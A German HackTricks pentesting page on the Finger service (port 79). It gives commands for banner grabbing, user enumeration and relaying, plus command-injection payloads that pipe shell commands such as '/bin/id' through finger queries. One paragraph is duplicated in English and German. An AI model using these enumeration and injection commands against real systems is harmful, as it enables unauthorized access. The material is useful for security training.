mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 11:03:24 +00:00
99 lines
5.8 KiB
Markdown
99 lines
5.8 KiB
Markdown
# 79 - Pentesting Finger
|
|
|
|
<details>
|
|
|
|
<summary><strong>Lernen Sie AWS-Hacking von Grund auf mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) **bei oder folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) **und** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.**
|
|
|
|
</details>
|
|
|
|
## **Grundlegende Informationen**
|
|
|
|
Das Programm/Der Dienst **Finger** wird verwendet, um Informationen über Computerbenutzer abzurufen. In der Regel umfasst die bereitgestellte Information den **Benutzernamen, den vollständigen Namen** und in einigen Fällen zusätzliche Details. Diese zusätzlichen Details könnten den Bürostandort und die Telefonnummer (falls verfügbar), die Zeit, zu der sich der Benutzer angemeldet hat, die Inaktivitätszeit (Idle-Zeit), den letzten Zeitpunkt, an dem der Benutzer E-Mails gelesen hat, und den Inhalt der Plan- und Projektdateien des Benutzers umfassen.
|
|
|
|
**Standardport:** 79
|
|
```
|
|
PORT STATE SERVICE
|
|
79/tcp open finger
|
|
```
|
|
## **Enumeration**
|
|
|
|
### **Banner Grabbing/Grundlegende Verbindung**
|
|
|
|
Banner Grabbing ist eine Technik, bei der versucht wird, Informationen über einen Dienst zu erhalten, indem die Banners oder Header-Nachrichten analysiert werden, die der Dienst bei der Verbindung an den Client sendet. Dies kann verwendet werden, um Informationen wie den Diensttyp, die Version, den Betriebssystemtyp und andere Details zu identifizieren.
|
|
|
|
Die grundlegende Verbindungsmethode für Banner Grabbing besteht darin, eine Verbindung zum Dienst herzustellen und die empfangene Banner-Nachricht zu analysieren. Dies kann mit Tools wie Telnet oder Netcat durchgeführt werden.
|
|
|
|
Ein Beispiel für die Verwendung von Telnet zum Banner Grabbing ist:
|
|
|
|
```bash
|
|
telnet <ziel-ip> <ziel-port>
|
|
```
|
|
|
|
Nachdem die Verbindung hergestellt wurde, wird der Banner oder die Header-Nachricht angezeigt, die Informationen über den Dienst enthält.
|
|
|
|
Eine andere Methode für das Banner Grabbing ist die Verwendung von Tools wie Nmap oder Bannergrab. Diese Tools automatisieren den Prozess des Banner Grabbing und können Informationen über mehrere Dienste gleichzeitig sammeln.
|
|
|
|
Es ist wichtig zu beachten, dass das Banner Grabbing eine passive Technik ist und normalerweise keine Sicherheitsbedenken verursacht. Es ist jedoch wichtig, diese Technik mit Vorsicht anzuwenden und die geltenden Gesetze und Richtlinien einzuhalten.
|
|
```bash
|
|
nc -vn <IP> 79
|
|
echo "root" | nc -vn <IP> 79
|
|
```
|
|
### **Benutzeraufzählung**
|
|
|
|
User enumeration is the process of gathering information about valid user accounts on a target system. This information can be used by an attacker to gain unauthorized access to the system.
|
|
|
|
Benutzeraufzählung ist der Prozess, bei dem Informationen über gültige Benutzerkonten auf einem Zielsystem gesammelt werden. Diese Informationen können von einem Angreifer verwendet werden, um unbefugten Zugriff auf das System zu erlangen.
|
|
```bash
|
|
finger @<Victim> #List users
|
|
finger admin@<Victim> #Get info of user
|
|
finger user@<Victim> #Get info of user
|
|
```
|
|
Alternativ können Sie **finger-user-enum** von [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) verwenden, hier einige Beispiele:
|
|
```bash
|
|
finger-user-enum.pl -U users.txt -t 10.0.0.1
|
|
finger-user-enum.pl -u root -t 10.0.0.1
|
|
finger-user-enum.pl -U users.txt -T ips.txt
|
|
```
|
|
#### **Nmap führt ein Skript aus, um die Standard-Skripte zu verwenden**
|
|
|
|
### Metasploit verwendet mehr Tricks als Nmap
|
|
```
|
|
use auxiliary/scanner/finger/finger_users
|
|
```
|
|
### Shodan
|
|
|
|
* `port:79 USER`
|
|
|
|
## Befehlsausführung
|
|
```bash
|
|
finger "|/bin/id@example.com"
|
|
finger "|/bin/ls -a /@example.com"
|
|
```
|
|
## Finger Bounce
|
|
|
|
[Verwenden Sie ein System als Finger-Relais](https://securiteam.com/exploits/2BUQ2RFQ0I/)
|
|
```
|
|
finger user@host@victim
|
|
finger @internal@external
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
|
|
|
|
</details>
|